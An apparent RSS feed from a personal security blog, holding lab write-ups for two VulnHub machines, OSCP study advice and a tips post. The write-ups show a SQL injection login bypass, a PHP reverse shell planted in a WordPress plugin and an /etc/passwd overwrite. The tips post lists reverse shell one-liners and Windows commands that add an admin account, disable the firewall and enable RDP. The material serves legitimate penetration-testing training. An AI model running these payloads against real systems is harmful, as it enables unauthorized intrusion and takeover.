DriftSec https://driftsec.ca/rss.xml en Mutillidae Debian Build https://driftsec.ca/Blog/mutillidae-debian-build <span>Mutillidae Debian Build</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span> <span>Wed, 09/19/2018 - 16:14</span> <div><p>File attachment is a Debian 9 build of Mutillidae. Mutillidae is a great platform to learn how to do web application hacking.</p> </div> <div> <div>File</div> <div><span class="file file--mime-application-zip file--package-x-generic"><a href="https://driftsec.ca/sites/default/files/2018-09/Debian9_Mutillidae.zip" type="application/zip; length=895894232">Debian9_Mutillidae.zip</a></span> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=11&amp;2=comment&amp;3=comment" token="lPEgMDSH-oO5Qc3fkDy8gAZX1XiVlV6LZeghV36nmVI"></drupal-render-placeholder> </section> Wed, 19 Sep 2018 19:14:33 +0000 drifter 11 at https://driftsec.ca https://driftsec.ca/Blog/mutillidae-debian-build#comments New/Updated website https://driftsec.ca/Blog/newupdated-website <span>New/Updated website</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span> <span>Mon, 06/05/2017 - 21:31</span> <div><p>Finally got around to updating the site and giving it a new look. It's coming along. Hopefully it'll all be smooth sailing from here! :)</p> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=9&amp;2=comment&amp;3=comment" token="1g0_Z49MsJ1d2YR9jPRW7ku1mahA70BrmRzz7aT_CCI"></drupal-render-placeholder> </section> Tue, 06 Jun 2017 00:31:40 +0000 drifter 9 at https://driftsec.ca hackfest2016: Quaoar https://driftsec.ca/VulnHub/hackfest2016-quaoar <span>hackfest2016: Quaoar</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span> <span>Mon, 06/05/2017 - 19:43</span> <div><p>[VM Completed on May 18th, 2017]</p> <p>This machine was created for the Hackfest 2016 conference that happens in Quebec City, Quebec, Canada. This is a conference I am hoping to attend one year. Looks like a great time. There are three flags on this box according to the information on the VM. But I could only find 2, the shell and root flag. Not sure what the post-exploitation flag is. Anyways, let's jump into it.<br /><br /> nmap time:</p> <pre> <code class="language-shell">root@kali:~# nmap -A -p- Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-17 08:52 ADT Nmap scan report for Quaoar ( Host is up (0.00047s latency). Not shown: 65526 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA) | 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA) |_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA) 53/tcp open domain ISC BIND 9.8.1-P1 | dns-nsid: |_ bind.version: 9.8.1-P1 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_Hackers |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: UIDL CAPA SASL PIPELINING STLS RESP-CODES TOP | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 |_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time. 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: IMAP4rev1 STARTTLS have LOGIN-REFERRALS more post-login SASL-IR LITERAL+ listed capabilities OK LOGINDISABLEDA0001 IDLE ID Pre-login ENABLE | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 |_ssl-date: 2017-05-17T11:53:14+00:00; +15s from scanner time. 445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP) 993/tcp open ssl/imap Dovecot imapd |_imap-capabilities: IMAP4rev1 have LOGIN-REFERRALS more post-login SASL-IR LITERAL+ ENABLE capabilities OK listed AUTH=PLAINA0001 ID Pre-login IDLE | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 |_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time. 995/tcp open ssl/pop3 Dovecot pop3d |_pop3-capabilities: UIDL CAPA SASL(PLAIN) RESP-CODES PIPELINING USER TOP | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 |_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time. MAC Address: 00:0C:29:82:B2:1D (VMware) Device type: general purpose Running: Linux 2.6.X|3.X OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 OS details: Linux 2.6.32 - 3.5 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 14s, deviation: 0s, median: 14s |_nbstat: NetBIOS name: QUAOAR, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown) | smb-os-discovery: | OS: Unix (Samba 3.6.3) | Computer name: Quaoar | NetBIOS computer name: | Domain name: | FQDN: Quaoar |_ System time: 2017-05-17T07:53:13-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server doesn't support SMBv2 protocol TRACEROUTE HOP RTT ADDRESS 1 0.47 ms Quaoar ( OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.39 seconds </code></pre> <p> </p> <p>So we got some basic services opened here. Got a hit on a webserver, so let's check that out.</p> <div class="image-preview"><img alt="website1" data-entity-type="file" data-entity-uuid="c2940e59-ffd2-41ba-ab53-13175b620694" src="/sites/default/files/inline-images/website1.png" /></div> <div class="image-preview"> </div> <p><img alt="website2" data-entity-type="file" data-entity-uuid="05ee5ae6-015b-4efe-90ab-0929705d7a97" src="/sites/default/files/inline-images/website2.png" /></p> <p> </p> <p>Alright. Not much to see here. Let's run directory buster on it and see what it finds.</p> <pre> <code class="language-shell">root@kali:~# dirb /usr/share/wordlists/dirb/big.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed May 17 08:57:37 2017 URL_BASE: WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt ----------------- GENERATED WORDS: 20458 ---- Scanning URL: ---- + (CODE:200|SIZE:1672) + (CODE:403|SIZE:289) + (CODE:200|SIZE:616848) + (CODE:200|SIZE:100) + (CODE:200|SIZE:271) + (CODE:200|SIZE:271) + (CODE:403|SIZE:294) ==&gt; DIRECTORY: ==&gt; DIRECTORY: ...truncated...</code></pre> <p> </p> <p>Wordpress was found. Awesome! Let's snoop there.</p> <p><img alt="website3" data-entity-type="file" data-entity-uuid="5b522d51-7894-4423-beb4-9af0f90659d4" src="/sites/default/files/inline-images/website3.png" /></p> <p> </p> <p>Since this VM is marked as really easy, I'm going to try the default credentials to see what happens. It's always a good first choice anyways. Default credentials for wordpress is admin:admin. And voila! It worked.</p> <p><img alt="website4" data-entity-type="file" data-entity-uuid="620d40a6-8a45-4c6f-8fed-62d3468afce6" src="/sites/default/files/inline-images/website4.png" /></p> <p> </p> <p>So I know there are easy ways to pop a reverse shell at this point with automated tools, but I like tinkering around. I edited the Hello Dolly plugin that comes with Wordpress and inserted a php reverse shell. I then opened a netcat listener and waited for the shell to pop once I activate the plugin. It worked, so now I have my low level shell.<br />  </p> <pre> <code class="language-shell">root@kali:~# nc -nlvp 4444 listening on [any] 4444 ... connect to [] from (UNKNOWN) [] 36687 Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux 21:21:45 up 1 day, 13:30, 0 users, load average: 0.08, 0.08, 0.17 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ python -c 'import pty;pty.spawn("/bin/bash")' www-data@Quaoar:/$ </code></pre> <p><br /> Flag 1:</p> <pre> <code class="language-shell">www-data@Quaoar:/home/wpadmin$ ls ls flag.txt www-data@Quaoar:/home/wpadmin$ cat flag.txt cat flag.txt 2bafe61f03117ac66a73c3c514de796e </code></pre> <p> </p> <p>Now, it's time to get my root shell. First things first, let's check the passwd file:</p> <pre> <code class="language-shell"> root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh .......Truncated....... postgres:x:115:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash tomcat6:x:116:126::/usr/share/tomcat6:/bin/false wpadmin:x:1001:1001::/home/wpadmin:/bin/sh</code></pre> <p> </p> <p>There is a user called wpadmin. Again, let's try the easy stuff. I used su to switch user to wpadmin and used the password wpadmin. It worked. So now I know the user account. I can also ssh into the box now instead of using my netcat listener. More stable. Stable is good.</p> <p>I tried to sudo su my way to root, but wpadmin isn't allowed to use sudo. I poked around and tried a few kernel exploits that were potentially capable of giving me my root prompt but no such luck. So since the box is running wordpress, I checked the config file to see if there anything juicy in there.</p> <pre> <code class="language-shell">/** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'rootpassword!'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /** */ define('WP_HOME','/wordpress/'); define('WP_SITEURL','/wordpress/');</code></pre> <p><br /> Ha. Ha... this is interesting. This just might be the info I'm looking for.</p> <pre> <code class="language-shell">wpadmin@Quaoar:/var/www/wordpress$ su Password: rootpassword! root@Quaoar:/var/www/wordpress# </code></pre> <p> </p> <p>Flag 2:</p> <pre> <code class="language-shell">root@Quaoar:/var/www/wordpress# cd /root root@Quaoar:~# ls flag.txt vmware-tools-distrib root@Quaoar:~# cat flag.txt 8e3f9ec016e3598c5eec11fd3d73f6fb</code></pre> <p> </p> <p>All done!!! Great VM for beginners to poke around on and see what they can do. It was really fun!</p> <p> </p> <p> </p> <p> </p> <p> </p> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=8&amp;2=comment&amp;3=comment" token="E4cewAAI5o_IFtONKG0oHArjRnZv_4JAc-CnRnLmMO4"></drupal-render-placeholder> </section> Mon, 05 Jun 2017 22:43:35 +0000 drifter 8 at https://driftsec.ca AtlSecCon 2017 https://driftsec.ca/Blog/atlseccon-2017 <span>AtlSecCon 2017</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span> <span>Sun, 04/30/2017 - 13:09</span> <div><p>I had the wonderful opportunity to present at AtlSecCon 2017! Was really nervous but the good people at AtlSecCon treated me awesome. I was in the first line of presenters on day 1. So it was over quick and I got to enjoy the rest of the conference.</p> <p>My presentation on phishing can be found at <a href="https://speakerdeck.com/drifter666/no-phishing-beyond-this-point">Speakers Deck</a>.</p> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=10&amp;2=comment&amp;3=comment" token="YckVX30_aqr-xobBuxYh1_EWuyROHe8PdCJuREjuTIY"></drupal-render-placeholder> </section> Sun, 30 Apr 2017 16:09:18 +0000 drifter 10 at https://driftsec.ca Hackday Albania 2016 https://driftsec.ca/VulnHub/hackday-albania-2016 <span>Hackday Albania 2016 </span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span> <span>Wed, 11/16/2016 - 15:09</span> <div><p>[VM Completed on Nov 11, 2016]</p> <p>First thing I'm going to point out is that this was the first machine I rooted in awhile. My wife gave birth to our first child in March and I stepped away from all this. So I was a little rusty, but things started to work once I sat and thought about it. Here we go!</p> <p>So the VM is set to DHCP and after a quick scavenger hunt, I found it. So naturally nmap is the next step. Since these aren't production systems, I just do a generic, lazy, full blown nmap scan to make sure I don't miss anything.</p> <p><img alt="" src="/sites/default/files/2017-06/01-nmapscan.png" style="height:598px; width:940px" /></p> <p> </p> <p>So it's running a webserver at port 8008. Let's open up Firefox and see what is there.</p> <p><img alt="" src="/sites/default/files/2017-06/02-defaultwebpage.png" style="height:608px; width:706px" /></p> <p><img alt="" src="/sites/default/files/2017-06/03-sourcecode.png" style="height:759px; width:958px" /></p> <p> </p> <p>Okay. So we have some Albanian language. I threw that into Google Translate to see what I can make of it. Being bilingual myself, I know Google Translate isn't the best at translating word for word. But I figured it would give me a rough translation:</p> <pre> Miresevini Welcome Ne qofte se jam UNE, e di se ku te shkoj ;) If I am, I know where to go;) OK ok, por jo ketu :) OK ok, but not here :) </pre> <p>Alright... So this has something to do with Mr. Robot. Well, lets see what dirb finds.</p> <p><img alt="" src="/sites/default/files/2017-06/04-dirb.png" style="height:633px; width:742px" /></p> <p> </p> <p>Nothing unusual here. There is a robots.txt file which I'm certain at this point is the connection with Mr. Robot. Let's grab it.</p> <p><img alt="" src="/sites/default/files/2017-06/05-wgetrobots.png" style="height:139px; width:595px" /></p> <p><img alt="" src="/sites/default/files/2017-06/06-catrobots.png" style="height:495px; width:291px" /></p> <p> </p> <p>Oh fun! Lots of crazy directories. Most of them had this picture.</p> <p><img alt="" src="/sites/default/files/2017-06/07-urlstocheck2.png" style="height:764px; width:961px" /></p> <p> </p> <p>This roughly translates to:</p> <pre> a eshte kjo direktoria e duhur apo po harxhoj kohen kot Is this a proper directory or are jerk </pre> <p>Well then... Something got lost in translation. Am I a jerk or is the server a jerk? ... Let's keep moving. Eventually I landed on this page.</p> <p><img alt="" src="/sites/default/files/2017-06/08-vulnbank.png" style="height:288px; width:460px" /></p> <p> </p> <p>Is there any vulnbank in there?</p> <p><img alt="" src="/sites/default/files/2017-06/09-clientlogin.png" style="height:541px; width:952px" /></p> <p> </p> <p>Hey! Looky here. A very secure bank. I better transfer to this bank. Looks unhackable. It's right in the title that it is a secure bank, right?</p> <p>Time to try some fuzzing.</p> <p><img alt="" src="/sites/default/files/2017-06/10-fuzz.png" /></p> <p> </p> <p>So according to this, I wasn't completely blind to sql injection here. I got one message back saying,"mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php". I know there is some input santization here. It doesn't like boolean input, so any of the AND/OR statements in mysql won't work. This part took me quite awhile to figure out. I had to reread some OSCP stuff. When you don't use this stuff everyday, you forget things. Anyways, what eventually got me in was this:</p> <pre> admin'%20# </pre> <p><img alt="" src="/sites/default/files/2017-06/11-sqli.png" /></p> <p><img alt="" src="/sites/default/files/2017-06/12-webapploggedin.png" /></p> <p> </p> <p>The %20 is url encoding for a space. So "admin'%20#", is really "admin' #". What this statement does, is comment out anything that comes after the username lookup part of the MySQL statement. So it bypasses the need for a password.</p> <p>Looking at the first page after logging in, I can clearly see an option to upload a file. So I tried uploading a php reverse shell and no luck.</p> <p><img alt="" src="/sites/default/files/2017-06/13-phpnogo.png" style="height:371px; width:397px" /></p> <p><img alt="" src="/sites/default/files/2017-06/14-phpnogo2.png" style="height:203px; width:776px" /></p> <p> </p> <p>Well then... how nice. They told me the file types they accept. So for the heck of it, I changed the extension from .php to .jpg. It looks like the previous attempts at uploading the .php file worked but it didn't do anything.</p> <p><img alt="" src="/sites/default/files/2017-06/15-jpgsuccess.png" style="height:439px; width:497px" /></p> <p> </p> <p>Time to start my netcat listener and success! Got my low level shell.</p> <p><img alt="" src="/sites/default/files/2017-06/16-revshell.png" style="height:542px; width:777px" /></p> <p>So time to snoop. First I checked what tools were available to me.</p> <p><img alt="" src="/sites/default/files/2017-06/17-toolsavail.png" style="height:149px; width:383px" /></p> <p> </p> <p>Python 3 was installed so I figured I would give myself somewhat of a better shell to work with here.</p> <p><img alt="" src="/sites/default/files/2017-06/18-bettershell.png" style="height:70px; width:458px" /></p> <p> </p> <p>Time for enumeration. First things I check are kernel, home directories, and files that have world wide read, write, and execute permissions.</p> <p><img alt="" src="/sites/default/files/2017-06/19-enum1.png" /></p> <p><img alt="" src="/sites/default/files/2017-06/20-enum2.png" /></p> <p><img alt="" src="/sites/default/files/2017-06/21-enum3.png" /></p> <p> </p> <p>From this output, I've determined that it's running a fairly new kernel. I couldn't find any direct exploits that I could leverage. I know there is a user by the name Taviso. So there might be something good there. Lastly, the very important /etc/passwd is writable by anyone. So that makes things very interesting.</p> <p>Well. I figured if I could switch user to Taviso, I might be able to push further into becoming root. Knowing this is an Ubuntu system, simply sudoing to root as Taviso might work. In this case, if I can input my own password for Taviso in the /etc/passwd file, it would be simple to do this. On a side note, in the OSCP course, changing the user's passwords was usually frowned upon. Yes, it was a viable vector, but it wasn't the take away Offensive Security was looking for. So this my first time doing this type of attack. It may seem rudimentary as a basic attack vector, but it's new to me. It's not that I never thought about it during my OSCP time in the labs, it just wasn't the OSCP way. ;)</p> <p>Since I'm not in a fully functional shell environment, I can't just nano or vi the /etc/passwd file and input that I need. I'll need to overwrite the file with a little bash script. But first, I must generate my own password hash into the /etc/passwd file.</p> <p><img alt="" src="/sites/default/files/2017-06/22-hashgenerated.png" style="height:44px; width:978px" /></p> <p>Then I put it in this little script to overwrite /etc/password. Notice the "" around EOF, this is so the text in red doesn't get lost in shell variables. (Click to enlarge)</p> <p><img alt="" src="/sites/default/files/2017-06/23-passwdscript.png" /></p> <p>Upload to the server using wget in /tmp/ and give it execute rights. Run the script...</p> <p> </p> <p><img alt="" src="/sites/default/files/2017-06/24-runscriptrun.png" style="height:344px; width:766px" /></p> <p> </p> <p>Check to see if the changes were made properly.</p> <p><img alt="" src="/sites/default/files/2017-06/25-newpasswd.png" style="height:751px; width:841px" /></p> <p> </p> <p>The changes worked. Time to su as Taviso and then sudo su with Taviso's password to see if root appears.</p> <p><img alt="" src="/sites/default/files/2017-06/26-root.png" style="height:197px; width:439px" /></p> <p> </p> <p>Woo! Box rooted! Now to check root's home directory to see if there is anything in there.</p> <p><img alt="" src="/sites/default/files/2017-06/27-flag.png" style="height:251px; width:427px" /></p> <p> </p> <p>As expected, a txt file with a hash for the ctf. More Albanian that roughly translates to:</p> <pre> Urime, Congratulations, Tani nis raportin! Now beings the report! Flag hash: d5ed38fdbf28bc4e58be142cf5a17cf5</pre> <p>Moral of the story here is: be sure to sanitize the user input.</p> <p> </p> <p>I had a lot of fun doing this. Hopefully I can keep this up. It's good exercise for the brain. Always learning new things and new ways to break a machine.</p> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=7&amp;2=comment&amp;3=comment" token="XclDo4EBJ-co3K9OihriJH27UPGfd4KD5wbKh9JYH34"></drupal-render-placeholder> </section> Wed, 16 Nov 2016 19:09:53 +0000 drifter 7 at https://driftsec.ca The HASK! https://driftsec.ca/Blog/hask <span>The HASK!</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span> <span>Sun, 06/05/2016 - 18:53</span> <div><p>I had the wonderful opportunity to present at The HASK last night, May 25th, in Downtown Halifax. I had a great time and I can't thank the organizers enough. I wish there was something like this when I was going to university. To see the amount of IT students and IT professionals at the event was amazing.</p> <p>I was asked to post the slideshow from my presentation. So you'll find it <a href="https://speakerdeck.com/drifter666/the-hask-oscp">here at Speaker Deck's website.</a></p> <p>Anyone looking for information on The HASK should go to their website at <a href="http://www.thehask.com">http://thehask.com</a>. I highly recommend attending.</p> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=6&amp;2=comment&amp;3=comment" token="7H2NushWfAU6Qys0xeMiKDyrLvbqw6kb1N4k7BFyk50"></drupal-render-placeholder> </section> Sun, 05 Jun 2016 21:53:45 +0000 drifter 6 at https://driftsec.ca My Recommendations for OSCP https://driftsec.ca/Blog/my-recommendations-oscp <span>My Recommendations for OSCP</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span> <span>Fri, 04/01/2016 - 14:51</span> <div><div class="content node-blog"> <div class="field field-name-body field-type-text-with-summary field-label-hidden"> <div class="field-items"> <div class="field-item even" property="content:encoded"> <p>I've been asked a couple of times now, "What do I need to know to become OSCP certified?". It's a hard question to answer. For people who don't know, OSCP stands for Offensive Security Certified Professional. It's a grueling course by the folks over at Offensive Security, but the payout is extraordinary! You can read my story over <a href="https://driftsec.ca/Blog/what-does-it-mean-me-be-oscp-certified">here</a>. Anyways, here's my list of recommendations:</p> <ul><li>Understand Windows operating systems (especially command line).</li> <li>Understand Linux operating systems.</li> <li>Extensive knowledge in networking.</li> <li>Be familiar with Wireshark and be able to read through packet captures.</li> <li>Be familiar with Nmap.</li> <li>Don't rely on vulnerability scanners like Nessus or OpenVAS. You won't be able to use these for the exam. You can use them in the lab, but try to maximize finding vulnerabilities on your own with nmap and poking around on the server.</li> <li>Understand how to read through code, especially C, Python, Perl, PHP, Ruby, and Shellcode. If you have zero experience in programming, I'd suggest taking a beginner course in Python. You won't be writing code from scratch, but you need to know how to read it.</li> <li>Be familiar with Assembly and a debugger. Don't dive heavily into this, as the course will guide you through this part. I had no experience in Assembly or a debugger going into OSCP but it wasn't a major problem.</li> <li>Be familiar with database applications like MySQL, MongoDB, MSSQL.</li> <li>Understand how CMS web applications work, like Drupal and Wordpress.</li> <li>Keep detailed notes. Even if the information seems irrelevant, copy and paste it. You'll never know when the smallest detail is the answer to the riddle. Offensive Security recommends using a program called KeepNote. I used it and it was great.</li> <li>Take lots of screenshots. KeepNote can take screenshots as well.</li> <li>Teaching yourself is huge. Be prepared to treat this course like a second job. You'll be putting in a lot of time. Some weeks I was putting in over 20 hours on top of a full time job.</li> <li>Take regular backups of your notes.</li> <li>Be sure to join the IRC channel for Offensive Security. You can chat with admins there and get hints. However, be sure you did your work before asking for help. You need to show the admins you are trying hard before they'll help you out. You can also vent with other OSCP students! Offensive Security no longer maintains the IRC channel. All help is done through their online support page and student forums.</li> <li>Download and install Kali and play around with it.</li> <li>Download virtual machines from Vulnhub.com and play around with them</li> <li>Most importantly, try harder and have fun!</li> </ul><p>This course is heavy. You'll feel overwhelmed and tired. Be sure to take lots of breaks and sleep. Being well-rested will give you a clear mind to work in the labs. Good luck!!</p> </div> </div> </div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=5&amp;2=comment&amp;3=comment" token="FDpRQwYdbnmWRnYAH9qRd8tLV8cpeL87AjLAWjYuDfg"></drupal-render-placeholder> </section> Fri, 01 Apr 2016 17:51:12 +0000 drifter 5 at https://driftsec.ca OSCP Tips and Tricks https://driftsec.ca/Blog/oscp-tips-and-tricks <span>OSCP Tips and Tricks</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span> <span>Fri, 04/01/2016 - 14:40</span> <div><p>Here is a grouped list of things that helped me during my OSCP course. This is just the tip of the iceberg of what commands you'll need to know. However, I used these commands a lot. I'm not going to go into details on what command does what. You should be able to figure it out or already know it.</p> <pre> <code class="language-shell">Linux Commands: uname -a hostname id ifconfig -a cat /etc/network/interfaces cat /etc/passwd cat /etc/shadow wget fetch ftp nc -nlvp {port} python -c "import pty; pty.spawn('/bin/bash')"</code></pre> <pre> <code class="language-shell">Windows Commands: ipconfig -a net user /add {username} {password} net localgroup administrators {username} /add type {filename.txt} netsh firewall set opmode disable REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</code></pre> <pre> <code class="language-shell">Metasploit: set AUTORUNSCRIPT migrate -f</code></pre> <pre> <code class="language-shell">Nmap: nmap -A -p- {IP} nmap -sV -sT -p- {IP} nmap -sU -p- {IP} nmap -O {IP}</code></pre> <pre> <code class="language-shell">Some Reverse Shell One-Liners: bash -i &gt;&amp; /dev/tcp/{IP}/{Port} 0&gt;&amp;1 nc -e /bin/sh {IP} {Port} rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc {IP} {Port} &gt;/tmp/f php -r '$sock=fsockopen("{IP}",{Port});exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");' See this website for more: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</code></pre> <p> </p> <p>Blogs and Websites on Privilege Escalation:</p> <p><a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a><br /><a href="http://www.fuzzysecurity.com/tutorials/16.html">http://www.fuzzysecurity.com/tutorials/16.html</a><br /><a href="http://it-ovid.blogspot.ca/2012/02/windows-privilege-escalation.html">http://it-ovid.blogspot.ca/2012/02/windows-privilege-escalation.html</a><br /><a href="http://netsec.ws/?p=309">http://netsec.ws/?p=309</a></p> <p> </p> <p>Useful Tools to Install in Kali:</p> <p><a href="https://github.com/apenwarr/sshuttle">sshuttle</a><br /><a href="https://github.com/rofl0r/proxychains-ng">proxychains-ng</a> <br /><a href="https://www.veil-framework.com/framework/veil-evasion/">veil-evasion</a></p> <p> </p> <p> </p> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=4&amp;2=comment&amp;3=comment" token="G1ri1hl2rhTBY1wYFh0cb_VQt-3p7RVs6EqmmOqOYhQ"></drupal-render-placeholder> </section> Fri, 01 Apr 2016 17:40:04 +0000 drifter 4 at https://driftsec.ca What does it mean to me to be OSCP certified? https://driftsec.ca/Blog/what-does-it-mean-me-be-oscp-certified <span>What does it mean to me to be OSCP certified?</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span> <span>Mon, 12/14/2015 - 23:03</span> <div><div class="content node-blog"> <div class="field field-name-body field-type-text-with-summary field-label-hidden"> <div class="field-items"> <div class="field-item even" property="content:encoded"> <p>What does it mean to be OSCP certified? This is a short and simple question however the answer is quite loaded. In one sense, it’s “just” another IT certification to add to my list. Another three to four letter acronym that the majority of people I know have to ask, “What do those four letters mean?”. Sure, it’s just four letters, but what most people don’t understand is the hard work, dedication, and effort that needs to be put in to get those four letters.</p> <p>When I started my journey to become an OSCP, I had no idea what I was stepping into. Being already OSWP certified, I thought I had a slight advantage, in that I knew how the Offensive Security courses were structured. I also thought that since I had a four-year university degree under my belt and several other certifications, I could handle this no problem. I couldn’t have been more wrong. There were nights I went to bed with headaches. This was the first course, [i]ever[/i], that I seriously considered throwing in the towel. I was a complete noob when it came to penetration testing and this course was proving it. It was a David and Goliath scenario and I didn’t know what to do.</p> <p>Eventually, things started to take a turn. I started to root systems in the OffSec lab. Things were starting to be fun. My employer was very good to renew my lab subscription which relieved some of that time constraint which was causing a block in my head. But I still kept thinking about the time. It would take a week before I rooted one system. It wasn’t until one of the OffSec admins reiterated, “This isn’t a race, it’s a marathon,” and reminded me that the purpose isn’t to just blow through all the lab machines; there is something to be learned from each machine, something to make you think differently. At this point, my head was overwhelmed. I’m sure my blood pressure was rising - I had to leave the OSCP journey for a bit. I took a month break. Enjoyed some summertime fun with my wife.</p> <p>After my month break from OSCP, I decided it was time to start again. With a fresh, clean head and knowing how things work, I felt much better this time. I started researching and googling the right terms. Learning new tips and tricks. Just trying things and for the most part they started working. Still lots of moments where I was banging my head off the keyboard. However, instead of taking one week to root a machine, I was rooting three and sometimes four in a week. It was great. I got a boost of confidence and instead of throwing in the towel, I was saying, “I can do this!”. When Offensive Security says “Try Harder!” they mean it. I was trying harder and it was working. After I conquered the server Humble, I felt pretty darn powerful. It was time to book the exam.</p> <p>The exam was stressful at first. I had 24 hours to write it and I wasn’t sure what to expect. I’ve read on multiple blogs about people writing a bunch of scripts to automate the whole enumeration process. I didn’t trust my scripting abilities to do so. However, in the labs, I just scanned machines one by one and it worked just as good. Doing this, I rooted more than enough systems to pass. I love the sense of humour the Offensive Security team has. The one machine that taunted me by calling me a noob during the exam, was the one machine that I wasn’t able to root. However, this noob is OSCP certified now!</p> </div> </div> </div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=3&amp;2=comment&amp;3=comment" token="Y85zpvOo0idsDualBn4IsyXXwzfA_2wor3FCVaO8Mgo"></drupal-render-placeholder> </section> Tue, 15 Dec 2015 03:03:01 +0000 drifter 3 at https://driftsec.ca